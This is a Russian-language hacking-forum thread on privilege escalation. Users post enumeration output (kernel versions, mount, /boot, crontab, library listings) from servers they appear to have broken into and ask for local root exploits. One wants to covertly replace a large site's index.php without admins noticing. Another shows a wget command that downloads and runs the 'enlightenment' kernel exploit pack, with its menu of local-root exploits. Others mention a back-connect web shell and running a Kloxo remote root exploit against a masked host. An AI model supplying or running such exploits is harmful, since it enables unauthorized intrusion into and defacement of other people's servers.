Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. multichat

    multichat New Member

    Joined:
    8 Dec 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Linux webserver 2.6.26-2-amd64 #1 SMP Thu Nov 5 02:23:12 UTC 2009 x86_64

    как сделать так чтобы незаметно можно было бы поменять индекс.пхп в корне папки (на которой неудается поменять права на 0777 ) ?
    Какой експлоит нужен и как именно это зделать? Переискал вес инет нигде толком нету инфы .
    Netcat лучше неиспользовать так как палиться сразу админами . Сайт Миллионик нехочеться потерять .
    короче : какой експлоит нужен , где скачать , как и где его запустить и зделать так чтобы было бы незаметно? )

    спасибо )
     
  2. multichat

    multichat New Member

    Joined:
    8 Dec 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    запустил на сервере enlightment КУДА ПИСАТь ВЫБОР СПЛОИТА? 0 , 1 , 2 ??

    Code:
    $ wget http://www.grsecurity.net/~spender/exploits/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
    Compiling exp_abacus.c...OK.
    Compiling exp_cheddarbay.c...OK.
    Compiling exp_ingom0wnar.c...OK.
    Compiling exp_moosecox.c...OK.
    Compiling exp_paokara.c...OK.
    Compiling exp_powerglove.c...OK.
    Compiling exp_sieve.c...OK.
    Compiling exp_therebel.c...OK.
    Compiling exp_vmware.c...failed.
    Compiling exp_wunderbar.c...OK.
     [+] MAPPED ZERO PAGE!
    Choose your exploit:
     [0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
     [1] MooseCox: Linux <= 2.6.31.5 pipe local root
     [2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root
     [3] Powerglove: Linux 2.6.31 perf_counter local root
     [4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
     [5] Wunderbar Emporium: Linux 2.X sendpage() local root
     [6] Exit
    >  ------------------------------------------------------------------------------
     The work of an intellectual is not to mould the political will of others; it
     is, through the analyses that he does in his own field, to re-examine
     evidence and assumptions, to shake up habitual ways of working and thinking,
     to dissipate conventional familiarities, to re-evaluate rules and
     institutions and to participate in the formation of a political will (where
     he has his role as citizen to play). --Foucault
     ------------------------------------------------------------------------------
     [+] Resolved set_fs_root to 0xffffffff802af1ee
     [+] Resolved set_fs_pwd to 0xffffffff802af18e
    Unable to acquire kernel symbols.  Copy the appropriate System.map to the current directory.
     
  3. goodmaer

    goodmaer Member

    Joined:
    12 Jul 2011
    Messages:
    127
    Likes Received:
    8
    Reputations:
    0
    FreeBSD 6.4-STABLE FreeBSD 6.4-STABLE #1: Wed Oct 5 16:08:37 MSD 2011

    http://www.exploit-db.com/exploits/16951/

    Пробьет?может кто скомпилировать?
     
  4. goodmaer

    goodmaer Member

    Joined:
    12 Jul 2011
    Messages:
    127
    Likes Received:
    8
    Reputations:
    0
    Как компилить сплоиты если нет gcc?
     
  5. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    goodmaer
    Зависит от сплоита, если компилить удаленно, а потом портировать на уязвимую тачку и использовать, то могут потребоваться самые различные манипуляции(например, position-independent или static). Ну и разумеется, иметь схожий образ системы крайне желательно. И вообще, тот сплоит, что ты привел выше требует скомпиленное с нетграфами ядро, а это явление нечастое.
     
  6. Hummer

    Hummer Member

    Joined:
    31 Jul 2012
    Messages:
    43
    Likes Received:
    23
    Reputations:
    5
    Linux 2.6.32-39-generic #86-Ubuntu SMP Mon Feb 13 21:47:32 UTC 2012 i686
    Ядру почти 2 года, но так ничего под него я и не нашел, может кто-то что-то подскажет.
     
    #526 Hummer, 26 Jan 2014
    Last edited: 26 Jan 2014
  7. hakwar

    hakwar New Member

    Joined:
    25 Dec 2010
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Подскажите эксплойт под
    Linux 2.6.32-042stab081.5 #1 SMP Mon Sep 30 16:52:24 MSK 2013 x86_64 x86_64 x86_64 GNU/Linux
     
  8. Rextor

    Rextor New Member

    Joined:
    26 Feb 2014
    Messages:
    40
    Likes Received:
    2
    Reputations:
    4
    Дополнение - на сервере нашлось некоторое количество файлов с 0777 правами за владением root/wheel. Я попробовал заменить содержимое на банальный "sudo что-нить" и запустить, но выдает sudo: sorry, you must have a tty to run sudo (работаю под веб шеллом с back-connect, подключиться по ssh похоже что никак).
    Эти файлы как-то все же могут помочь в повышении прав?
     
  9. BuG_4F

    BuG_4F Member

    Joined:
    20 May 2008
    Messages:
    88
    Likes Received:
    67
    Reputations:
    5
    Помогите пожалуйста получить рут на этом сервере:

    cat /proc/version
    ls -la /boot
    mount
    cat /proc/sys/vm/mmap_min_addr
     
  10. lion_art

    lion_art New Member

    Joined:
    20 Mar 2014
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
    Уважаемые!! Крайне необходимо!!! или иными словами Хелп!

    $ uname -a
    Linux www 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux

    $ mount
    /dev/xvda1 on / type ext3 (rw,errors=remount-ro)
    tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    udev on /dev type tmpfs (rw,mode=0755)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
    none on /proc/xen type xenfs (rw)

    $ cat /proc/version
    Linux version 2.6.32-5-amd64 (Debian 2.6.32-46) ([email protected])
    (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Sun Sep 23 10:07:46 UTC 2012

    $ ls -la /boot
    total 13236
    drwxr-xr-x 3 root root 4096 Feb 12 2013 .
    drwxr-xr-x 21 root root 4096 Feb 12 2013 ..
    -rw-r--r-- 1 root root 1666397 Sep 23 2012 System.map-2.6.32-5-amd64
    -rw-r--r-- 1 root root 106172 Sep 23 2012 config-2.6.32-5-amd64
    drwxr-xr-x 3 root root 4096 Feb 12 2013 grub
    -rw-r--r-- 1 root root 9310575 Feb 12 2013 initrd.img-2.6.32-5-amd64
    -rw-r--r-- 1 root root 2423968 Sep 23 2012 vmlinuz-2.6.32-5-amd64

    $ df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/xvda1 34G 30G 1.8G 95% /
    tmpfs 1003M 0 1003M 0% /lib/init/rw
    udev 990M 72K 989M 1% /dev
    tmpfs 1003M 0 1003M 0% /dev/shm
    $ cat /etc/issue
    Debian GNU/Linux 6.0 \n \l

    $ cat /etc/crontab
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.

    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

    # m h dom mon dow user command
    17 * * * * root cd / && run-parts --report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #

    # **** backup:
    00 03 * * * root /usr/local/etc/wwwbackup/makebackup
     
    #530 lion_art, 11 Apr 2014
    Last edited: 12 Apr 2014
  11. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    Получить рута

    Всем привет...
    Пытаюсь получить рута этим сплоитом
    Code:
    [B]Kloxo remote root exploit[/B]
    uname -a:
    2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
    прописываю:
    perl morxkloxo.pl http://****.com:7778 **.**.**.** 20845
    с начало вроде идет а потом:
    В гугле ни чего не нашел..
    кто то может сталкивался с этой проблемой, помогите...
    Спасибо
     
  12. PurePass777

    PurePass777 Member

    Joined:
    2 Apr 2013
    Messages:
    52
    Likes Received:
    13
    Reputations:
    0
    Вообщем ситуация такая, есть некая система:

    Code:
    sh-3.00$ uname -a
    Linux linuxcpXXXXXX.XX.net 2.6.9-89.33.1.ELhugemem #1 SMP Mon Nov 15 18:55:19 EST 2010 i686 i686 i386 GNU/Linux
    
    sh-3.00$ id
    uid=99(nobody) gid=99(nobody) groups=99(nobody)
    
    sh-3.00$ ls -la /boot
    total 9388
    drwxr-xr-x   3 root root    4096 Dec 13  2010 .
    drwxr-xr-x  31 root root    4096 Jun 21 22:05 ..
    -rw-r--r--   1 root root     512 Jun 29  2009 boot.6800
    -rw-r--r--   1 root root    5824 Nov 15  2004 boot.b
    -rw-r--r--   1 root root     612 Nov 15  2004 chain.b
    -rw-r--r--   1 root root   51219 Nov 15  2010 config-2.6.9-89.33.1.ELhugemem
    -rw-r--r--   1 root root   51183 Apr 20  2009 config-2.6.9-89.ELhugemem
    -rw-r--r--   1 root root   51234 Apr 20  2009 config-2.6.9-89.ELsmp
    drwxr-xr-x   2 root root    4096 Dec 13  2010 grub
    -rw-r--r--   1 root root  739274 Dec 13  2010 initrd-2.6.9-89.33.1.ELhugemem.img
    -rw-r--r--   1 root root  736665 Jun 29  2009 initrd-2.6.9-89.ELhugemem.img
    -rw-r--r--   1 root root  740492 Jun 29  2009 initrd-2.6.9-89.ELsmp.img
    -rw-------   1 root root   96768 Dec 13  2010 map
    -rw-r--r--   1 root root   23108 Aug  3  2005 message
    -rw-r--r--   1 root root   21282 Aug  3  2005 message.ja
    -rw-r--r--   1 root root     640 Nov 15  2004 os2_d.b
    -rw-r--r--   1 root root   68442 Nov 15  2010 symvers-2.6.9-89.33.1.ELhugemem.gz
    -rw-r--r--   1 root root   68337 Apr 20  2009 symvers-2.6.9-89.ELhugemem.gz
    -rw-r--r--   1 root root   68382 Apr 20  2009 symvers-2.6.9-89.ELsmp.gz
    -rw-r--r--   1 root root  785852 Nov 15  2010 System.map-2.6.9-89.33.1.ELhugemem
    -rw-r--r--   1 root root  785288 Apr 20  2009 System.map-2.6.9-89.ELhugemem
    -rw-r--r--   1 root root  785489 Apr 20  2009 System.map-2.6.9-89.ELsmp
    -rw-r--r--   1 root root 1452843 Nov 15  2010 vmlinuz-2.6.9-89.33.1.ELhugemem
    -rw-r--r--   1 root root 1452279 Apr 20  2009 vmlinuz-2.6.9-89.ELhugemem
    -rw-r--r--   1 root root 1472335 Apr 20  2009 vmlinuz-2.6.9-89.ELsmp
    
    sh-3.00$ ls -la --full-time /lib/lib*
    lrwxrwxrwx  1 root root      11 2009-06-29 05:03:58.000000000 -0400 /lib/libacl.so -> libacl.so.1
    lrwxrwxrwx  1 root root      15 2009-06-29 04:57:54.000000000 -0400 /lib/libacl.so.1 -> libacl.so.1.1.0
    -rwxr-xr-x  1 root root   22164 2007-11-30 09:31:58.000000000 -0500 /lib/libacl.so.1.1.0
    -rwxr-xr-x  1 root root   14980 2012-01-26 18:10:43.000000000 -0500 /lib/libanl-2.3.4.so
    lrwxrwxrwx  1 root root      15 2012-02-14 05:35:05.000000000 -0500 /lib/libanl.so.1 -> libanl-2.3.4.so
    lrwxrwxrwx  1 root root      18 2009-06-29 05:00:45.000000000 -0400 /lib/libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x  1 root root  686604 2005-01-10 05:09:50.000000000 -0500 /lib/libasound.so.2.0.0
    lrwxrwxrwx  1 root root      12 2009-06-29 05:03:58.000000000 -0400 /lib/libattr.so -> libattr.so.1
    lrwxrwxrwx  1 root root      16 2009-06-29 04:57:53.000000000 -0400 /lib/libattr.so.1 -> libattr.so.1.1.0
    -rwxr-xr-x  1 root root   30899 2007-01-24 08:13:32.000000000 -0500 /lib/libattr.so.1.1.0
    lrwxrwxrwx  1 root root      17 2010-02-03 05:34:15.000000000 -0500 /lib/libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x  1 root root   60140 2010-01-20 16:07:03.000000000 -0500 /lib/libaudit.so.0.0.0
    lrwxrwxrwx  1 root root      15 2009-06-29 05:39:37.000000000 -0400 /lib/libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x  1 root root   25196 2009-01-27 11:36:42.000000000 -0500 /lib/libblkid.so.1.0
    -rwxr-xr-x  1 root root    8320 2012-01-26 18:10:43.000000000 -0500 /lib/libBrokenLocale-2.3.4.so
    lrwxrwxrwx  1 root root      24 2012-02-14 05:35:05.000000000 -0500 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.3.4.so
    -rwxr-xr-x  1 root root 1535392 2012-01-26 18:10:44.000000000 -0500 /lib/libc-2.3.4.so
    lrwxrwxrwx  1 root root      11 2009-06-29 05:03:59.000000000 -0400 /lib/libcap.so -> libcap.so.1
    lrwxrwxrwx  1 root root      14 2009-06-29 04:57:54.000000000 -0400 /lib/libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x  1 root root   11788 2004-08-31 12:40:55.000000000 -0400 /lib/libcap.so.1.10
    -rwxr-xr-x  1 root root  192392 2012-01-26 18:10:44.000000000 -0500 /lib/libcidn-2.3.4.so
    lrwxrwxrwx  1 root root      16 2012-02-14 05:35:05.000000000 -0500 /lib/libcidn.so.1 -> libcidn-2.3.4.so
    lrwxrwxrwx  1 root root      17 2009-06-29 05:39:37.000000000 -0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x  1 root root    7004 2009-01-27 11:36:42.000000000 -0500 /lib/libcom_err.so.2.1
    -rwxr-xr-x  1 root root   41956 2012-01-26 18:10:44.000000000 -0500 /lib/libcrypt-2.3.4.so
    lrwxrwxrwx  1 root root      19 2009-06-30 08:06:53.000000000 -0400 /lib/libcrypto.so.0 -> libcrypto.so.0.9.6b
    -rwxr-xr-x  1 root root  824272 2010-03-19 06:33:54.000000000 -0400 /lib/libcrypto.so.0.9.6b
    -rwxr-xr-x  1 root root  945152 2012-01-27 18:27:42.000000000 -0500 /lib/libcrypto.so.0.9.7a
    lrwxrwxrwx  1 root root      19 2009-06-29 05:06:01.000000000 -0400 /lib/libcrypto.so.2 -> libcrypto.so.0.9.6b
    lrwxrwxrwx  1 root root      19 2009-06-29 04:58:26.000000000 -0400 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a
    lrwxrwxrwx  1 root root      17 2012-02-14 05:35:05.000000000 -0500 /lib/libcrypt.so.1 -> libcrypt-2.3.4.so
    lrwxrwxrwx  1 root root      13 2012-02-14 05:35:05.000000000 -0500 /lib/libc.so.6 -> libc-2.3.4.so
    -rwxr-xr-x  1 root root  251476 2004-11-30 12:40:09.000000000 -0500 /lib/libdb2.so.3
    -rwxr-xr-x  1 root root  614112 2004-11-30 12:40:09.000000000 -0500 /lib/libdb-3.3.so
    -rwxr-xr-x  1 root root  762496 2004-11-30 12:40:09.000000000 -0500 /lib/libdb-4.1.so
    -rwxr-xr-x  1 root root  843984 2007-06-06 08:37:18.000000000 -0400 /lib/libdb-4.2.so
    lrwxrwxrwx  1 root root      11 2009-06-29 05:03:48.000000000 -0400 /lib/libdb.so.3 -> libdb2.so.3
    lrwxrwxrwx  1 root root      19 2011-07-13 05:35:53.000000000 -0400 /lib/libdevmapper.a -> libdevmapper.a.1.02
    -r-xr-xr-x  1 root root  314298 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper.a.1.02
    lrwxrwxrwx  1 root root      25 2011-07-13 05:35:53.000000000 -0400 /lib/libdevmapper-event.a -> libdevmapper-event.a.1.02
    -r-xr-xr-x  1 root root   33684 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper-event.a.1.02
    lrwxrwxrwx  1 root root      37 2011-08-19 05:34:10.000000000 -0400 /lib/libdevmapper-event-lvm2mirror.so -> libdevmapper-event-lvm2mirror.so.2.02
    -r-xr-xr-x  1 root root    7596 2011-08-03 13:00:49.000000000 -0400 /lib/libdevmapper-event-lvm2mirror.so.2.02
    lrwxrwxrwx  1 root root      39 2011-08-19 05:34:10.000000000 -0400 /lib/libdevmapper-event-lvm2snapshot.so -> libdevmapper-event-lvm2snapshot.so.2.02
    -r-xr-xr-x  1 root root    6016 2011-08-03 13:00:48.000000000 -0400 /lib/libdevmapper-event-lvm2snapshot.so.2.02
    lrwxrwxrwx  1 root root      26 2011-07-13 05:35:53.000000000 -0400 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x  1 root root   14852 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper-event.so.1.02
    lrwxrwxrwx  1 root root      20 2011-07-13 05:35:53.000000000 -0400 /lib/libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x  1 root root   24140 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper.so.1.00
    -r-xr-xr-x  1 root root   25196 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper.so.1.01
    -r-xr-xr-x  1 root root   84280 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper.so.1.02
    -rwxr-xr-x  1 root root   16748 2012-01-26 18:10:44.000000000 -0500 /lib/libdl-2.3.4.so
    lrwxrwxrwx  1 root root      14 2012-02-14 05:35:05.000000000 -0500 /lib/libdl.so.2 -> libdl-2.3.4.so
    lrwxrwxrwx  1 root root      13 2009-06-29 05:39:37.000000000 -0400 /lib/libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x  1 root root   19824 2009-01-27 11:36:42.000000000 -0500 /lib/libe2p.so.2.3
    lrwxrwxrwx  1 root root      16 2009-06-29 05:39:37.000000000 -0400 /lib/libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x  1 root root   92532 2009-01-27 11:36:42.000000000 -0500 /lib/libext2fs.so.2.4
    -rwxr-xr-x  1 root root   40108 2009-12-10 07:28:13.000000000 -0500 /lib/libgcc_s-3.4.6-20060404.so.1
    lrwxrwxrwx  1 root root      28 2010-01-14 05:35:14.000000000 -0500 /lib/libgcc_s.so.1 -> libgcc_s-3.4.6-20060404.so.1
    -rwxr-xr-x  1 root root   23416 2006-05-04 14:57:03.000000000 -0400 /lib/libiw.so.27
    -rwxr-xr-x  1 root root   25880 2006-05-04 14:57:03.000000000 -0400 /lib/libiw.so.28
    -rwxr-xr-x  1 root root    6952 2005-12-05 10:43:35.000000000 -0500 /lib/libkeyutils-1.0.2.so
    lrwxrwxrwx  1 root root      20 2009-06-29 04:57:53.000000000 -0400 /lib/libkeyutils.so.1 -> libkeyutils-1.0.2.so
    -rwxr-xr-x  1 root root   33040 2004-11-30 12:40:09.000000000 -0500 /lib/liblohedr.a
    -rwxr-xr-x  1 root root  212164 2012-01-26 18:10:44.000000000 -0500 /lib/libm-2.3.4.so
    lrwxrwxrwx  1 root root      13 2012-02-14 05:35:06.000000000 -0500 /lib/libm.so.6 -> libm-2.3.4.so
    -rwxr-xr-x  1 root root    8476 2012-01-26 18:10:43.000000000 -0500 /lib/libNoVersion-2.3.4.so
    lrwxrwxrwx  1 root root      21 2012-02-14 05:35:05.000000000 -0500 /lib/libNoVersion.so.1 -> libNoVersion-2.3.4.so
    -rwxr-xr-x  1 root root  101748 2012-01-26 18:10:44.000000000 -0500 /lib/libnsl-2.3.4.so
    lrwxrwxrwx  1 root root      15 2012-02-14 05:35:06.000000000 -0500 /lib/libnsl.so.1 -> libnsl-2.3.4.so
    -rwxr-xr-x  1 root root   35788 2012-01-26 18:10:44.000000000 -0500 /lib/libnss1_compat-2.3.4.so
    lrwxrwxrwx  1 root root      23 2012-02-14 05:35:06.000000000 -0500 /lib/libnss1_compat.so.1 -> libnss1_compat-2.3.4.so
    -rwxr-xr-x  1 root root   17960 2012-01-26 18:10:44.000000000 -0500 /lib/libnss1_dns-2.3.4.so
    lrwxrwxrwx  1 root root      20 2012-02-14 05:35:06.000000000 -0500 /lib/libnss1_dns.so.1 -> libnss1_dns-2.3.4.so
    -rwxr-xr-x  1 root root   42616 2012-01-26 18:10:44.000000000 -0500 /lib/libnss1_files-2.3.4.so
    lrwxrwxrwx  1 root root      22 2012-02-14 05:35:06.000000000 -0500 /lib/libnss1_files.so.1 -> libnss1_files-2.3.4.so
    -rwxr-xr-x  1 root root   39228 2012-01-26 18:10:44.000000000 -0500 /lib/libnss1_nis-2.3.4.so
    lrwxrwxrwx  1 root root      20 2012-02-14 05:35:06.000000000 -0500 /lib/libnss1_nis.so.1 -> libnss1_nis-2.3.4.so
    -rwxr-xr-x  1 root root   40812 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_compat-2.3.4.so
    lrwxrwxrwx  1 root root      19 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_compat.so.1 -> libnss1_compat.so.1
    lrwxrwxrwx  1 root root      22 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_compat.so.2 -> libnss_compat-2.3.4.so
    lrwxrwxrwx  1 root root      18 2009-06-29 04:59:47.000000000 -0400 /lib/libnss_db.so.2 -> libnss_db.so.2.0.0
    -rwxr-xr-x  1 root root  548068 2004-10-20 16:11:53.000000000 -0400 /lib/libnss_db.so.2.0.0
    -rwxr-xr-x  1 root root   22616 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_dns-2.3.4.so
    lrwxrwxrwx  1 root root      16 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_dns.so.1 -> libnss1_dns.so.1
    lrwxrwxrwx  1 root root      19 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_dns.so.2 -> libnss_dns-2.3.4.so
    -rwxr-xr-x  1 root root   47420 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_files-2.3.4.so
    lrwxrwxrwx  1 root root      18 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_files.so.1 -> libnss1_files.so.1
    lrwxrwxrwx  1 root root      21 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_files.so.2 -> libnss_files-2.3.4.so
    -rwxr-xr-x  1 root root   23464 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_hesiod-2.3.4.so
    lrwxrwxrwx  1 root root      22 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.3.4.so
    -rwxr-xr-x  1 root root 2309964 2010-11-10 14:41:57.000000000 -0500 /lib/libnss_ldap-2.3.4.so
    lrwxrwxrwx  1 root root      20 2009-06-29 05:00:23.000000000 -0400 /lib/libnss_ldap.so.2 -> libnss_ldap-2.3.4.so
    -rwxr-xr-x  1 root root   43036 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_nis-2.3.4.so
    -rwxr-xr-x  1 root root   56320 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_nisplus-2.3.4.so
    lrwxrwxrwx  1 root root      23 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.3.4.so
    lrwxrwxrwx  1 root root      16 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_nis.so.1 -> libnss1_nis.so.1
    lrwxrwxrwx  1 root root      19 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_nis.so.2 -> libnss_nis-2.3.4.so
    -rwxr-xr-x  1 root root   16076 2012-02-22 07:19:42.000000000 -0500 /lib/libnss_winbind.so.2
    -rwxr-xr-x  1 root root  845988 2012-02-22 07:19:42.000000000 -0500 /lib/libnss_wins.so.2
    lrwxrwxrwx  1 root root      15 2009-06-29 04:58:40.000000000 -0400 /lib/libpamc.so.0 -> libpamc.so.0.77
    -rwxr-xr-x  1 root root    9108 2010-05-26 14:41:01.000000000 -0400 /lib/libpamc.so.0.77
    lrwxrwxrwx  1 root root      19 2009-06-29 04:58:40.000000000 -0400 /lib/libpam_misc.so.0 -> libpam_misc.so.0.77
    -rwxr-xr-x  1 root root    9524 2010-05-26 14:41:01.000000000 -0400 /lib/libpam_misc.so.0.77
    lrwxrwxrwx  1 root root      14 2009-06-29 04:58:40.000000000 -0400 /lib/libpam.so.0 -> libpam.so.0.77
    -rwxr-xr-x  1 root root   32184 2010-05-26 14:41:01.000000000 -0400 /lib/libpam.so.0.77
    lrwxrwxrwx  1 root root      16 2009-06-29 04:58:04.000000000 -0400 /lib/libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x  1 root root   65560 2007-11-28 09:26:55.000000000 -0500 /lib/libpcre.so.0.0.1
    -rwxr-xr-x  1 root root   47892 2010-08-17 09:16:59.000000000 -0400 /lib/libproc-3.2.3.so
    -rwxr-xr-x  1 root root   95380 2012-01-26 18:10:44.000000000 -0500 /lib/libpthread-0.10.so
    lrwxrwxrwx  1 root root      18 2012-02-14 05:35:06.000000000 -0500 /lib/libpthread.so.0 -> libpthread-0.10.so
    -rwxr-xr-x  1 root root   81140 2012-01-26 18:10:44.000000000 -0500 /lib/libresolv-2.3.4.so
    lrwxrwxrwx  1 root root      18 2012-02-14 05:35:06.000000000 -0500 /lib/libresolv.so.2 -> libresolv-2.3.4.so
    -rwxr-xr-x  1 root root   47692 2012-01-26 18:10:44.000000000 -0500 /lib/librt-2.3.4.so
    lrwxrwxrwx  1 root root      14 2012-02-14 05:35:06.000000000 -0500 /lib/librt.so.1 -> librt-2.3.4.so
    -rwxr-xr-x  1 root root   33040 2006-05-04 14:57:03.000000000 -0400 /lib/libsecdev.a
    -rwxr-xr-x  1 root root   17400 2012-01-26 18:10:43.000000000 -0500 /lib/libSegFault.so
    -rwxr-xr-x  1 root root   56336 2007-07-30 13:52:40.000000000 -0400 /lib/libselinux.so.1
    -rwxr-xr-x  1 root root   53736 2004-08-30 11:50:13.000000000 -0400 /lib/libsepol.so.1
    lrwxrwxrwx  1 root root      16 2009-06-30 08:06:53.000000000 -0400 /lib/libssl.so.0 -> libssl.so.0.9.6b
    -rwxr-xr-x  1 root root  186304 2010-03-19 06:33:54.000000000 -0400 /lib/libssl.so.0.9.6b
    -rwxr-xr-x  1 root root  217864 2012-01-27 18:27:42.000000000 -0500 /lib/libssl.so.0.9.7a
    lrwxrwxrwx  1 root root      16 2009-06-29 05:06:01.000000000 -0400 /lib/libssl.so.2 -> libssl.so.0.9.6b
    lrwxrwxrwx  1 root root      16 2009-06-29 04:58:26.000000000 -0400 /lib/libssl.so.4 -> libssl.so.0.9.7a
    lrwxrwxrwx  1 root root      12 2009-06-29 05:39:37.000000000 -0400 /lib/libss.so.2 -> libss.so.2.0
    -rwxr-xr-x  1 root root   18468 2009-01-27 11:36:42.000000000 -0500 /lib/libss.so.2.0
    lrwxrwxrwx  1 root root      19 2009-06-29 04:57:57.000000000 -0400 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   12592 2004-06-15 20:34:46.000000000 -0400 /lib/libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   25744 2012-01-26 18:10:44.000000000 -0500 /lib/libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2012-02-14 05:35:06.000000000 -0500 /lib/libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x  1 root root   15860 2012-01-26 18:10:44.000000000 -0500 /lib/libutil-2.3.4.so
    lrwxrwxrwx  1 root root      16 2012-02-14 05:35:06.000000000 -0500 /lib/libutil.so.1 -> libutil-2.3.4.so
    lrwxrwxrwx  1 root root      14 2009-06-29 05:39:37.000000000 -0400 /lib/libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x  1 root root   11296 2009-01-27 11:36:42.000000000 -0500 /lib/libuuid.so.1.2
    -rw-r--r--  1 root root   49558 2009-04-21 07:26:29.000000000 -0400 /lib/libwrap.a
    lrwxrwxrwx  1 root root      16 2009-06-29 05:40:01.000000000 -0400 /lib/libwrap.so -> libwrap.so.0.7.6
    lrwxrwxrwx  1 root root      16 2009-06-29 05:40:01.000000000 -0400 /lib/libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x  1 root root   28504 2009-04-21 07:26:29.000000000 -0400 /lib/libwrap.so.0.7.6
    
    sh-3.00$ mount
    /dev/cciss/c0d0p1 on / type ext3 (rw,usrquota)
    none on /proc type proc (rw)
    none on /sys type sysfs (rw)
    none on /dev/pts type devpts (rw,gid=5,mode=620)
    usbfs on /proc/bus/usb type usbfs (rw)
    none on /dev/shm type tmpfs (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
    /tmp on /var/tmp type none (rw,noexec,nosuid,bind)
    
    sh-3.00$ df -h
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/cciss/c0d0p1     130G  111G   12G  91% /
    none                  4.0G     0  4.0G   0% /dev/shm
    /usr/tmpDSK           485M   15M  446M   4% /tmp
    /tmp                  485M   15M  446M   4% /var/tmp
    
    sh-3.00$ cat /etc/issue
    Red Hat Enterprise Linux ES release 4 (Nahant Update 9)
    Kernel \r on an \m
    
    sh-3.00$ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    # ntp client moved to cron.daily
    
    sh-3.00$ cat /proc/version
    Linux version 2.6.9-89.33.1.ELhugemem ([email protected]) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-11)) #1 SMP Mon Nov 15 18:55:19 EST 2010
    
    sh-3.00$ cat /proc/sys/vm/mmap_min_addr
    0
    
    sh-3.00$ pwd
    /tmp
    
    sh-3.00$ ls -la /usr/bin/staprun
    ---s--x---  1 root stapusr 56408 Jun 10  2011 /usr/bin/staprun
